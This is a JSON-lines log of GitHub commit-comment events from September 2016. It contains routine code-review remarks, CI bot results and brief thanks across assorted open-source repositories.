{"id":"4551253521","type":"CommitCommentEvent","actor":{"login":"rudybrian"},"repo":{"name":"FalconChristmas/fpp"},"payload":{"comment":{"id":18989930,"position":5,"line":339,"path":"src/Makefile","commit_id":"330215c14cbc0cc414e5ed22d721889fc3215a43","created_at":"2016-09-12T19:08:49Z","updated_at":"2016-09-12T19:08:49Z","body":"@cpinkham this doesn't appear to be working as there is no ../lib/librgbmatrix.so being created (which is causing fppd to fail to start due to the missing library)\r\n\r\nShould this be\r\n`ln -s ../lib/librgbmatrix_Standard.so ../lib/librgbmatrix.so`\r\ninstead?"}},"created_at":"2016-09-12T19:08:49Z"}
{"id":"4551255012","type":"CommitCommentEvent","actor":{"login":"Steve-Fenton"},"repo":{"name":"wmelani/tsUnit"},"payload":{"comment":{"id":18989935,"position":null,"line":null,"path":null,"commit_id":"1fe8c4fda96789ca35495f8f757daad5881b4716","created_at":"2016-09-12T19:09:08Z","updated_at":"2016-09-12T19:09:08Z","body":"Wow - thanks for helping with this issue :+1: "}},"created_at":"2016-09-12T19:09:08Z"}
{"id":"4551255992","type":"CommitCommentEvent","actor":{"login":"uaandrei"},"repo":{"name":"uaandrei/npg"},"payload":{"comment":{"id":18989937,"position":null,"line":null,"path":null,"commit_id":"6c907ee0e3205a3d48b6dce983646cf3a99f5069","created_at":"2016-09-12T19:09:21Z","updated_at":"2016-09-12T19:09:21Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;vFPfq9hS&#x2F;18-todos\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> todos</a>"}},"created_at":"2016-09-12T19:09:21Z"}
{"id":"4551256878","type":"CommitCommentEvent","actor":{"login":"adsharma"},"repo":{"name":"adsharma/flatbuffers"},"payload":{"comment":{"id":18989940,"position":77,"line":878,"path":"src/idl_gen_cpp.cpp","commit_id":"3371c8aadb8615506dd177f85520f3a07eafdf10","created_at":"2016-09-12T19:09:31Z","updated_at":"2016-09-12T19:09:31Z","body":"In the general case, yeah. But this table used the original_order directive."}},"created_at":"2016-09-12T19:09:31Z"}
{"id":"4551257013","type":"CommitCommentEvent","actor":{"login":"ask-compu"},"repo":{"name":"JoeTheHuman/Scammer-Bingo-Reborn"},"payload":{"comment":{"id":18989941,"position":null,"line":null,"path":null,"commit_id":"2ed3ebeac9c88cce543ec9dfb2d3982483b822e7","created_at":"2016-09-12T19:09:33Z","updated_at":"2016-09-12T19:09:33Z","body":"java link is broken"}},"created_at":"2016-09-12T19:09:33Z"}
{"id":"4551258466","type":"CommitCommentEvent","actor":{"login":"TeoTwawki"},"repo":{"name":"ymkc/darkstar"},"payload":{"comment":{"id":18989944,"position":null,"line":null,"path":null,"commit_id":"bb107d7e881ce3aaca178b90bb9957dacea65137","created_at":"2016-09-12T19:09:48Z","updated_at":"2016-09-12T19:09:48Z","body":"thanks a bunch @ymkc :smiley: "}},"created_at":"2016-09-12T19:09:48Z"}
{"id":"4551259116","type":"CommitCommentEvent","actor":{"login":"ask-compu"},"repo":{"name":"JoeTheHuman/Scammer-Bingo-Reborn"},"payload":{"comment":{"id":18989945,"position":null,"line":null,"path":null,"commit_id":"2ed3ebeac9c88cce543ec9dfb2d3982483b822e7","created_at":"2016-09-12T19:09:56Z","updated_at":"2016-09-12T19:09:56Z","body":"and the windows version doesnt run very well in WINE"}},"created_at":"2016-09-12T19:09:56Z"}
{"id":"4551259149","type":"CommitCommentEvent","actor":{"login":"rickyc"},"repo":{"name":"Gemalexandrag/2016-fall-awesome"},"payload":{"comment":{"id":18989946,"position":null,"line":null,"path":null,"commit_id":"9d8fd340e304a787f328b16806ce01ceb617b4a4","created_at":"2016-09-12T19:09:56Z","updated_at":"2016-09-12T19:09:56Z","body":"Are you suppose to print out the results together? 🤔\r\n\r\nPrompt: What is your name?\r\nAnswer: Gem\r\nPrompt: What's your favorite pet?\r\nAnswer: Dog\r\nAlert: `Dog`s are my favorite pet as well `Gem`!"}},"created_at":"2016-09-12T19:09:56Z"}
{"id":"4551261185","type":"CommitCommentEvent","actor":{"login":"IntelOrca"},"repo":{"name":"OpenRCT2/OpenRCT2"},"payload":{"comment":{"id":18989952,"position":null,"line":null,"path":null,"commit_id":"a2bf35eee547426bfa9da17b03d81b89508972da","created_at":"2016-09-12T19:10:19Z","updated_at":"2016-09-12T19:10:19Z","body":"Oh I forgot about that again!"}},"created_at":"2016-09-12T19:10:19Z"}
{"id":"4551262966","type":"CommitCommentEvent","actor":{"login":"TeoTwawki"},"repo":{"name":"ymkc/darkstar"},"payload":{"comment":{"id":18989955,"position":null,"line":null,"path":null,"commit_id":"bb107d7e881ce3aaca178b90bb9957dacea65137","created_at":"2016-09-12T19:10:38Z","updated_at":"2016-09-12T19:10:38Z","body":"I hit sargas already, but I can roll back the commit if you want it with these."}},"created_at":"2016-09-12T19:10:38Z"}
{"id":"4551267221","type":"CommitCommentEvent","actor":{"login":"celloexpressions"},"repo":{"name":"xwp/wordpress-develop"},"payload":{"comment":{"id":18989966,"position":11,"line":1412,"path":"src/wp-includes/theme.php","commit_id":"807fc302dd0a044b71970c1b80288393e0bad66a","created_at":"2016-09-12T19:11:31Z","updated_at":"2016-09-12T19:11:31Z","body":"The JS preview will show the instant results, but selective refresh is also needed to provide the full preview with sanitization, etc. applied from PHP. If there are differences between the two they'll show up on a slight delay when the selective refresh kicks in.\r\n\r\nI'm not sure how the bidirectional part affects this though, @westonruter?"}},"created_at":"2016-09-12T19:11:31Z"}
{"id":"4551268059","type":"CommitCommentEvent","actor":{"login":"adsharma"},"repo":{"name":"adsharma/flatbuffers"},"payload":{"comment":{"id":18989968,"position":48,"line":1234,"path":"tests/test.cpp","commit_id":"3371c8aadb8615506dd177f85520f3a07eafdf10","created_at":"2016-09-12T19:11:41Z","updated_at":"2016-09-12T19:11:41Z","body":"Good point. I can redo the implementation such that writes are atomic. Most processors guarantee a properly aligned 64 byte write to be atomic."}},"created_at":"2016-09-12T19:11:41Z"}
{"id":"4551271370","type":"CommitCommentEvent","actor":{"login":"robnagler"},"repo":{"name":"radiasoft/devops"},"payload":{"comment":{"id":18989974,"position":null,"line":null,"path":null,"commit_id":"15e8d8e8a23602efbffc63564d86fba82a883eb2","created_at":"2016-09-12T19:12:22Z","updated_at":"2016-09-12T19:12:22Z","body":"Fix 58db8fa90a46ae508befa1063fe0060e514d0533"}},"created_at":"2016-09-12T19:12:22Z"}
{"id":"4551271390","type":"CommitCommentEvent","actor":{"login":"adsharma"},"repo":{"name":"adsharma/flatbuffers"},"payload":{"comment":{"id":18989975,"position":59,"line":1245,"path":"tests/test.cpp","commit_id":"3371c8aadb8615506dd177f85520f3a07eafdf10","created_at":"2016-09-12T19:12:22Z","updated_at":"2016-09-12T19:12:22Z","body":"Happy to use a different name. Do you have any suggestions?"}},"created_at":"2016-09-12T19:12:22Z"}
{"id":"4551272968","type":"CommitCommentEvent","actor":{"login":"adsharma"},"repo":{"name":"adsharma/flatbuffers"},"payload":{"comment":{"id":18989977,"position":null,"line":null,"path":null,"commit_id":"3371c8aadb8615506dd177f85520f3a07eafdf10","created_at":"2016-09-12T19:12:40Z","updated_at":"2016-09-12T19:12:40Z","body":"Sure, will include the generated files in the next rev."}},"created_at":"2016-09-12T19:12:40Z"}
{"id":"4551276786","type":"CommitCommentEvent","actor":{"login":"dakrone"},"repo":{"name":"dakrone/clj-http"},"payload":{"comment":{"id":18989987,"position":null,"line":null,"path":null,"commit_id":"7ec10113776655d04234edcb3238a5a50943980a","created_at":"2016-09-12T19:13:26Z","updated_at":"2016-09-12T19:13:26Z","body":"@joelittlejohn do you know what the HTTP spec says for providing an array in the querystring line? I am in favor of whatever the standards are (if there are any)"}},"created_at":"2016-09-12T19:13:26Z"}
{"id":"4551277218","type":"CommitCommentEvent","actor":{"login":"rstoyanchev"},"repo":{"name":"bclozel/spring-framework"},"payload":{"comment":{"id":18989991,"position":68,"line":68,"path":"spring-web/src/main/java/org/springframework/http/codec/ResourceRegionHttpMessageWriter.java","commit_id":"69bfa723c6f21f46ea3dbc2aebb2f4a9f1d124f7","created_at":"2016-09-12T19:13:31Z","updated_at":"2016-09-12T19:13:31Z","body":"This could just be just `then` (vs flatMap + then):\r\n````java\r\nreturn Mono.from(inputStream)\r\n\t\t.then(region -> {\r\n\t\t\twriteSingleResourceRegionHeaders(region, contentType, outputMessage);\r\n\t\t\treturn writeResourceRegion(region, type, outputMessage);\r\n\t\t});\r\n````"}},"created_at":"2016-09-12T19:13:31Z"}
{"id":"4551278037","type":"CommitCommentEvent","actor":{"login":"gubatron"},"repo":{"name":"frostwire/frostwire-jlibtorrent"},"payload":{"comment":{"id":18989994,"position":24,"line":30,"path":"src/main/java/com/frostwire/jlibtorrent/alerts/BlockTimeoutAlert.java","commit_id":"351c4055a03d218691fa7cd1e00f30ade7c250ab","created_at":"2016-09-12T19:13:40Z","updated_at":"2016-09-12T19:13:40Z","body":"would it make sense to have a `BlockAlert` that has those `blockIndex()` and `pieceIndex()` methods as well as any other common block related methods?"}},"created_at":"2016-09-12T19:13:40Z"}
{"id":"4551285185","type":"CommitCommentEvent","actor":{"login":"eduardolopezuy"},"repo":{"name":"adempiere/adempiereFMS"},"payload":{"comment":{"id":18990014,"position":1,"line":1,"path":"README.md","commit_id":"c31b177da6a0acec7dfdd27d81034176dc806048","created_at":"2016-09-12T19:15:01Z","updated_at":"2016-09-12T19:15:01Z","body":"ADempiere Fleet Management\r\n\r\nCapabilities to include the management of fleet resources (driver, power, equipment, etc) involved in fulfilling orders and shipments. \r\n\r\nAsset lifecycle management  \r\nDriver hire, education, scheduling, and payroll  \r\nOrder capture and Customer Relationship Management  \r\nFleet planning – consolidation, fleet versus common-carrier trade-offs, multi-leg, multi-mode  Driver and equipment assignment, and utilization  \r\nSafety and Maintenance\r\nFuel control\r\nAsset tracking  \r\nVehicle Licensing/ Regulatory compliance\r\nAsset inventory management at asset pool locations  \r\nDriver dispatch, mobile communications, tracking \r\nCosting – fleet, external service providers, special services, accessorials  \r\nPayables – driver pay, independent contractors and external service providers \r\nBillables – bill customers for service, asset usage  \r\nCost accruals and revenue recognition  \r\n\r\n"}},"created_at":"2016-09-12T19:15:01Z"}
{"id":"4551285718","type":"CommitCommentEvent","actor":{"login":"paulp"},"repo":{"name":"mossprescott/quasar"},"payload":{"comment":{"id":18990016,"position":15,"line":85,"path":"mongodb/src/main/scala/quasar/physical/mongodb/workflow/package.scala","commit_id":"ac09b920419b658ca38ac66cf8621413740a7e2b","created_at":"2016-09-12T19:15:08Z","updated_at":"2016-09-12T19:15:08Z","body":"How many members of `exprFp` do you need? Usually in this situation if you explicitly name the ones you require rather than wildcard importing it will work."}},"created_at":"2016-09-12T19:15:08Z"}
{"id":"4551285981","type":"CommitCommentEvent","actor":{"login":"celloexpressions"},"repo":{"name":"xwp/wordpress-develop"},"payload":{"comment":{"id":18990017,"position":11,"line":1412,"path":"src/wp-includes/theme.php","commit_id":"807fc302dd0a044b71970c1b80288393e0bad66a","created_at":"2016-09-12T19:15:11Z","updated_at":"2016-09-12T19:15:11Z","body":"Make sure that the `render_callback` only prints the content of the style tags, not the style tags themselves. The contents of the partial selector are replaced but the container stays in a selective refresh."}},"created_at":"2016-09-12T19:15:11Z"}
{"id":"4551287264","type":"CommitCommentEvent","actor":{"login":"joeduncan"},"repo":{"name":"joeduncan/enzyme"},"payload":{"comment":{"id":18990023,"position":null,"line":null,"path":null,"commit_id":"26c155becae9111a95a5aa2c09a27134161bce0a","created_at":"2016-09-12T19:15:25Z","updated_at":"2016-09-12T19:15:25Z","body":"I changed it and added more test cases\r\n"}},"created_at":"2016-09-12T19:15:25Z"}
{"id":"4551290096","type":"CommitCommentEvent","actor":{"login":"paulp"},"repo":{"name":"mossprescott/quasar"},"payload":{"comment":{"id":18990032,"position":15,"line":85,"path":"mongodb/src/main/scala/quasar/physical/mongodb/workflow/package.scala","commit_id":"ac09b920419b658ca38ac66cf8621413740a7e2b","created_at":"2016-09-12T19:15:55Z","updated_at":"2016-09-12T19:15:55Z","body":"Also, does every member of exprFp have an explicitly declared type? If not, adding them may solve the problem."}},"created_at":"2016-09-12T19:15:55Z"}
{"id":"4551292720","type":"CommitCommentEvent","actor":{"login":"rugk"},"repo":{"name":"opening-hours/opening_hours_map"},"payload":{"comment":{"id":18990038,"position":null,"line":null,"path":null,"commit_id":"1d82098218d08930d2ea225b112e6dc446f8e503","created_at":"2016-09-12T19:16:25Z","updated_at":"2016-09-12T19:16:25Z","body":"Protocol-independent URLs (`//`) would of course be superior, but HTTPS-only is alos a good thing-\r\n"}},"created_at":"2016-09-12T19:16:25Z"}
{"id":"4551296259","type":"CommitCommentEvent","actor":{"login":"lesv"},"repo":{"name":"GoogleCloudPlatform/getting-started-java"},"payload":{"comment":{"id":18990046,"position":34,"line":76,"path":"helloworld-jsp/pom.xml","commit_id":"1cae0c439040430a46e50253a5b0ff628381c79e","created_at":"2016-09-12T19:17:03Z","updated_at":"2016-09-12T19:17:03Z","body":"It changes the maven command line, not breaks it.  You must now do appengine:deploy"}},"created_at":"2016-09-12T19:17:03Z"}
{"id":"4551297249","type":"CommitCommentEvent","actor":{"login":"Gemalexandrag"},"repo":{"name":"Gemalexandrag/2016-fall-awesome"},"payload":{"comment":{"id":18990048,"position":null,"line":null,"path":null,"commit_id":"9d8fd340e304a787f328b16806ce01ceb617b4a4","created_at":"2016-09-12T19:17:14Z","updated_at":"2016-09-12T19:17:14Z","body":"i'm not shure😕\n\nOn Mon, Sep 12, 2016 at 3:09 PM, Ricky C. <notifications@github.com> wrote:\n\n> Are you suppose to print out the results together? 🤔\n>\n> Prompt: What is your name?\n> Answer: Gem\n> Prompt: What's your favorite pet?\n> Answer: Dog\n> Alert: Dogs are my favorite pet as well Gem!\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/Gemalexandrag/2016-fall-awesome/commit/9d8fd340e304a787f328b16806ce01ceb617b4a4#commitcomment-18989946>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AQdqQgsdw_LOJW18bFgbjD1hoFCXc_1iks5qpaOFgaJpZM4J67MH>\n> .\n>\n"}},"created_at":"2016-09-12T19:17:14Z"}
{"id":"4551298122","type":"CommitCommentEvent","actor":{"login":"Gemalexandrag"},"repo":{"name":"Gemalexandrag/2016-fall-awesome"},"payload":{"comment":{"id":18990056,"position":null,"line":null,"path":null,"commit_id":"9d8fd340e304a787f328b16806ce01ceb617b4a4","created_at":"2016-09-12T19:17:25Z","updated_at":"2016-09-12T19:17:25Z","body":"sure\n\n\nOn Mon, Sep 12, 2016 at 3:17 PM, Gemmy Alexandra <gemalexandrag@gmail.com>\nwrote:\n\n> i'm not shure😕\n>\n> On Mon, Sep 12, 2016 at 3:09 PM, Ricky C. <notifications@github.com>\n> wrote:\n>\n>> Are you suppose to print out the results together? 🤔\n>>\n>> Prompt: What is your name?\n>> Answer: Gem\n>> Prompt: What's your favorite pet?\n>> Answer: Dog\n>> Alert: Dogs are my favorite pet as well Gem!\n>>\n>> —\n>> You are receiving this because you authored the thread.\n>> Reply to this email directly, view it on GitHub\n>> <https://github.com/Gemalexandrag/2016-fall-awesome/commit/9d8fd340e304a787f328b16806ce01ceb617b4a4#commitcomment-18989946>,\n>> or mute the thread\n>> <https://github.com/notifications/unsubscribe-auth/AQdqQgsdw_LOJW18bFgbjD1hoFCXc_1iks5qpaOFgaJpZM4J67MH>\n>> .\n>>\n>\n>\n"}},"created_at":"2016-09-12T19:17:25Z"}
{"id":"4551298141","type":"CommitCommentEvent","actor":{"login":"kakawka"},"repo":{"name":"beautyfree/dotfiles"},"payload":{"comment":{"id":18990058,"position":null,"line":null,"path":null,"commit_id":"27382d495d10f82a36dd41750c3ccc84151bfcd8","created_at":"2016-09-12T19:17:25Z","updated_at":"2016-09-12T19:17:25Z","body":"алоу, мне скучно, че это за херня"}},"created_at":"2016-09-12T19:17:25Z"}
{"id":"4551299662","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18990062,"position":null,"line":null,"path":null,"commit_id":"5ec92564b06f1714cc9de355b6c174cc6e1fda54","created_at":"2016-09-12T19:17:43Z","updated_at":"2016-09-12T19:17:43Z","body":"ASIHPValidation (shenb) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1760 of 1760 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5ec92564b06f1714cc9de355b6c174cc6e1fda54-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5ec92564b06f1714cc9de355b6c174cc6e1fda54-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5ec92564b06f1714cc9de355b6c174cc6e1fda54-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.15%25-green.svg)</a>\n"}},"created_at":"2016-09-12T19:17:43Z"}
{"id":"4551300090","type":"CommitCommentEvent","actor":{"login":"MikeFriswell"},"repo":{"name":"MikeFriswell/ChangeMakersNatSciWebsite"},"payload":{"comment":{"id":18990066,"position":null,"line":null,"path":null,"commit_id":"08ab670af177f9b0a26d2585e6cce0030c409878","created_at":"2016-09-12T19:17:48Z","updated_at":"2016-09-12T19:17:48Z","body":"Test"}},"created_at":"2016-09-12T19:17:48Z"}
{"id":"4551301165","type":"CommitCommentEvent","actor":{"login":"ymkc"},"repo":{"name":"ymkc/darkstar"},"payload":{"comment":{"id":18990070,"position":null,"line":null,"path":null,"commit_id":"bb107d7e881ce3aaca178b90bb9957dacea65137","created_at":"2016-09-12T19:18:02Z","updated_at":"2016-09-12T19:18:02Z","body":"I will just drop it from here abd thanx for hinting!"}},"created_at":"2016-09-12T19:18:02Z"}
{"id":"4551301453","type":"CommitCommentEvent","actor":{"login":"eownis"},"repo":{"name":"eownis/node-argon2"},"payload":{"comment":{"id":18990071,"position":null,"line":null,"path":null,"commit_id":"ebb51c7890bdafc3d8e44b2f7fd8c900ad73daea","created_at":"2016-09-12T19:18:06Z","updated_at":"2016-09-12T19:18:06Z","body":"And with https://github.com/ranisalt/node-argon2/pull/57 I don't think there is still the need to install gcc via brew so the OS X part can be removed. Would be cool if people on macOS without brew and gcc installed could confirm that `npm install argon2` work since the PR https://github.com/ranisalt/node-argon2/pull/57 (but I guess that since I don't need to specify `CXX=g++-6` before `npm install argon2` anymore this work)"}},"created_at":"2016-09-12T19:18:06Z"}
{"id":"4551302141","type":"CommitCommentEvent","actor":{"login":"dbyron0"},"repo":{"name":"locationlabs/ansible-role_docker"},"payload":{"comment":{"id":18990074,"position":null,"line":null,"path":null,"commit_id":"8fdbb3bdc82ef23ab46121a90dfb1cc1a26e940e","created_at":"2016-09-12T19:18:14Z","updated_at":"2016-09-12T19:18:14Z","body":"Looks good to me."}},"created_at":"2016-09-12T19:18:14Z"}
{"id":"4551309097","type":"CommitCommentEvent","actor":{"login":"vendethiel"},"repo":{"name":"non/kind-projector"},"payload":{"comment":{"id":18990090,"position":34,"line":190,"path":"README.md","commit_id":"6cd9f1b4969b2b43b1eb64741a2df583bff7a17c","created_at":"2016-09-12T19:19:34Z","updated_at":"2016-09-12T19:19:34Z","body":"missing a closing `]`"}},"created_at":"2016-09-12T19:19:34Z"}
{"id":"4551312176","type":"CommitCommentEvent","actor":{"login":"aldenml"},"repo":{"name":"frostwire/frostwire-jlibtorrent"},"payload":{"comment":{"id":18990102,"position":24,"line":30,"path":"src/main/java/com/frostwire/jlibtorrent/alerts/BlockTimeoutAlert.java","commit_id":"351c4055a03d218691fa7cd1e00f30ade7c250ab","created_at":"2016-09-12T19:20:14Z","updated_at":"2016-09-12T19:20:14Z","body":"I'm trying to mirror the libtorrent api with just a friendly java layer as close as possible, if you see some OO hierarchy is probably because it's that way in libtorrent"}},"created_at":"2016-09-12T19:20:14Z"}
{"id":"4551314397","type":"CommitCommentEvent","actor":{"login":"iKenshu"},"repo":{"name":"juliohurtado/hechizos-hl"},"payload":{"comment":{"id":18990108,"position":5,"line":17,"path":"spells/models.py","commit_id":"442b294062e76e5584aea8f8ba3e98270c453536","created_at":"2016-09-12T19:20:38Z","updated_at":"2016-09-12T19:20:38Z","body":"Agregando soporte para acentos y demás en url"}},"created_at":"2016-09-12T19:20:38Z"}
{"id":"4551316915","type":"CommitCommentEvent","actor":{"login":"kmcfate"},"repo":{"name":"voxpupuli/puppet-php"},"payload":{"comment":{"id":18990114,"position":null,"line":null,"path":null,"commit_id":"6d4534a1d2738e16bb93800ed547a937336b6367","created_at":"2016-09-12T19:21:11Z","updated_at":"2016-09-12T19:21:11Z","body":"Just to note, this change has broken older ruby versions (1.8.7)\r\n\r\nCould not autoload puppet/provider/package/pear: /var/lib/puppet/lib/puppet/provider/package/pear.rb:4: syntax error, unexpected ':', expecting $end ...ackage).provide :pear, parent: Puppet::Provider::Package do ^"}},"created_at":"2016-09-12T19:21:11Z"}
{"id":"4551318025","type":"CommitCommentEvent","actor":{"login":"ManuelDeLeon"},"repo":{"name":"joeduncan/enzyme"},"payload":{"comment":{"id":18990116,"position":null,"line":null,"path":null,"commit_id":"26c155becae9111a95a5aa2c09a27134161bce0a","created_at":"2016-09-12T19:21:24Z","updated_at":"2016-09-12T19:21:24Z","body":"You smell that? It's the sweet smell of a painless contribution.\r\n\r\nOther projects require you to sacrifice a chicken and a goat for them to fix anything.\r\n\r\nThanks."}},"created_at":"2016-09-12T19:21:24Z"}
{"id":"4551320471","type":"CommitCommentEvent","actor":{"login":"MaxWell31rus"},"repo":{"name":"MaxWell31rus/automatic-palm-tree"},"payload":{"comment":{"id":18990119,"position":null,"line":null,"path":null,"commit_id":"fd3e14afb3d2b450557a6f0e8c33725c429c020a","created_at":"2016-09-12T19:21:53Z","updated_at":"2016-09-12T19:21:53Z","body":"ok"}},"created_at":"2016-09-12T19:21:53Z"}
{"id":"4551320851","type":"CommitCommentEvent","actor":{"login":"Benzhaomin"},"repo":{"name":"Benzhaomin/backupninja"},"payload":{"comment":{"id":18990121,"position":null,"line":null,"path":null,"commit_id":"000d2cf40af10bc0e77b0da4f60142a34b3f3351","created_at":"2016-09-12T19:21:57Z","updated_at":"2016-09-12T19:21:57Z","body":"@maethor Hi, I sent a pull request https://0xacab.org/riseuplabs/backupninja/merge_requests/1"}},"created_at":"2016-09-12T19:21:57Z"}
{"id":"4551323246","type":"CommitCommentEvent","actor":{"login":"psc1961"},"repo":{"name":"psc1961/Mod2_solution"},"payload":{"comment":{"id":18990126,"position":17,"line":17,"path":"css/styles.css","commit_id":"bcf49677cd3a9ac7718257fb4385b19c83353000","created_at":"2016-09-12T19:22:28Z","updated_at":"2016-09-12T19:22:28Z","body":"# sdfsdsfd"}},"created_at":"2016-09-12T19:22:28Z"}
{"id":"4551329072","type":"CommitCommentEvent","actor":{"login":"whatyouhide"},"repo":{"name":"elixir-addicts/rollbax"},"payload":{"comment":{"id":18990144,"position":null,"line":null,"path":null,"commit_id":"d54029f6a8d62d6347294534a02de9df4ae53890","created_at":"2016-09-12T19:23:36Z","updated_at":"2016-09-12T19:23:36Z","body":"💟 "}},"created_at":"2016-09-12T19:23:36Z"}
{"id":"4551336308","type":"CommitCommentEvent","actor":{"login":"fgasperij"},"repo":{"name":"instedd/planwise"},"payload":{"comment":{"id":18990162,"position":5,"line":80,"path":"resources/planwise/plpgsql/functions.sql","commit_id":"fdf1ca9133fc0e134a53eaa58b59b8d5b81c792c","created_at":"2016-09-12T19:25:06Z","updated_at":"2016-09-12T19:25:06Z","body":"`unaligned_taget_maxy <= region_ymax`, not less than. It's the same case as `target_maxx`. It should be `region_ymax - unaligned_target_maxy` and the next line should be a subtraction instead of a sum."}},"created_at":"2016-09-12T19:25:06Z"}
{"id":"4551339229","type":"CommitCommentEvent","actor":{"login":"paulp"},"repo":{"name":"mossprescott/quasar"},"payload":{"comment":{"id":18990169,"position":10,"line":328,"path":"mongodb/src/main/scala/quasar/physical/mongodb/expression/ExprOpCore.scala","commit_id":"ebcf3c2f61e4308b40c9182cd7f1924996114c7a","created_at":"2016-09-12T19:25:41Z","updated_at":"2016-09-12T19:25:41Z","body":"Unrelated to the import issue, and my allergy to duplication is especially profound, but...\r\n```scala\r\nprivate type R = T[EX]\r\n@inline private implicit def convert(expr: ExprOpCoreF[EX]): R = inj(expr).embed\r\n```\r\nand then a great deal of cruft falls way.\r\n```\r\ndef $setEquals(left: R, right: R): R = $setEqualsF(left, right)\r\n// etc.\r\n```"}},"created_at":"2016-09-12T19:25:41Z"}
{"id":"4551344939","type":"CommitCommentEvent","actor":{"login":"pottsj"},"repo":{"name":"pottsj/Mr.-Krabs"},"payload":{"comment":{"id":18990173,"position":null,"line":null,"path":null,"commit_id":"d96a7d07f795e8022f6fa3e42576e434bf20b13f","created_at":"2016-09-12T19:26:49Z","updated_at":"2016-09-12T19:26:49Z","body":"The Life Of Mr. Karbs\r\n-Add Capitals"}},"created_at":"2016-09-12T19:26:49Z"}
{"id":"4551348632","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18990182,"position":null,"line":null,"path":null,"commit_id":"5ec92564b06f1714cc9de355b6c174cc6e1fda54","created_at":"2016-09-12T19:27:30Z","updated_at":"2016-09-12T19:27:30Z","body":"ASIHPValidation (shenb) - Win64-Windows-7-VisualStudio-12: OK (2324 of 2332 tests passed, 24 test warnings)\n\n * 11 tests had: EIO diffs.\n * 7 tests had: ESO big diffs.\n * 8 tests had: Table big diffs.\n * 3 tests had: MTR big diffs.\n * 16 tests had: ESO small diffs.\n * 25 tests had: AUD diffs.\n * 25 tests had: RDD diffs.\n * 13 tests had: MTR small diffs.\n * 1 test had: ERR diffs.\n * 1 test had: MTD diffs.\n * 1 test had: Table small diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5ec92564b06f1714cc9de355b6c174cc6e1fda54-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5ec92564b06f1714cc9de355b6c174cc6e1fda54-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.66%25-yellow.svg)</a> \n"}},"created_at":"2016-09-12T19:27:30Z"}
{"id":"4551353602","type":"CommitCommentEvent","actor":{"login":"shamasis"},"repo":{"name":"postmanlabs/postman-collection"},"payload":{"comment":{"id":18990189,"position":5,"line":167,"path":"test/unit/response-mime.test.js","commit_id":"3560353cf57ee8fe289c6c72512df68b0db2fddd","created_at":"2016-09-12T19:28:31Z","updated_at":"2016-09-12T19:28:31Z","body":"Why's this skipped?"}},"created_at":"2016-09-12T19:28:31Z"}
{"id":"4551356537","type":"CommitCommentEvent","actor":{"login":"joelittlejohn"},"repo":{"name":"dakrone/clj-http"},"payload":{"comment":{"id":18990196,"position":null,"line":null,"path":null,"commit_id":"7ec10113776655d04234edcb3238a5a50943980a","created_at":"2016-09-12T19:29:06Z","updated_at":"2016-09-12T19:29:06Z","body":"Hi Lee. \r\n\r\nUnfortunately neither the HTTP, URL spec, nor the URI spec covers the query string in detail, however most web servers allow the use of repeating parameters. It's a common method of supporting multi-value parameters (and I don't believe `field[0]=a&field[1]=b&field[2]=c` is). For instance, all Java servlet containers (including Jetty) support repeating parameters of the kind that used to be supported but clj-http, because the Servlet specification defines a repeating parameter as the way to provide a list of values."}},"created_at":"2016-09-12T19:29:06Z"}
{"id":"4551357206","type":"CommitCommentEvent","actor":{"login":"ranisalt"},"repo":{"name":"eownis/node-argon2"},"payload":{"comment":{"id":18990200,"position":null,"line":null,"path":null,"commit_id":"ebb51c7890bdafc3d8e44b2f7fd8c900ad73daea","created_at":"2016-09-12T19:29:15Z","updated_at":"2016-09-12T19:29:15Z","body":"Damn, wtf is going with my mind. Sorry, I thought the instructions were still with gcc 5."}},"created_at":"2016-09-12T19:29:15Z"}
{"id":"4551359572","type":"CommitCommentEvent","actor":{"login":"shamasis"},"repo":{"name":"postmanlabs/postman-collection"},"payload":{"comment":{"id":18990207,"position":43,"line":219,"path":"lib/collection/url.js","commit_id":"3560353cf57ee8fe289c6c72512df68b0db2fddd","created_at":"2016-09-12T19:29:39Z","updated_at":"2016-09-12T19:29:39Z","body":"Why's this needed?"}},"created_at":"2016-09-12T19:29:39Z"}
{"id":"4551361021","type":"CommitCommentEvent","actor":{"login":"spalladino"},"repo":{"name":"instedd/planwise"},"payload":{"comment":{"id":18990212,"position":5,"line":80,"path":"resources/planwise/plpgsql/functions.sql","commit_id":"fdf1ca9133fc0e134a53eaa58b59b8d5b81c792c","created_at":"2016-09-12T19:29:55Z","updated_at":"2016-09-12T19:29:55Z","body":"True, `=` holds as well, in which case `target_maxy == region_ymax`.\r\n\r\nAs for switching to `region_ymax - unaligned_target_maxy` and changing the next line to a substraction, though mathematically it's the same, it *is* more clear."}},"created_at":"2016-09-12T19:29:55Z"}
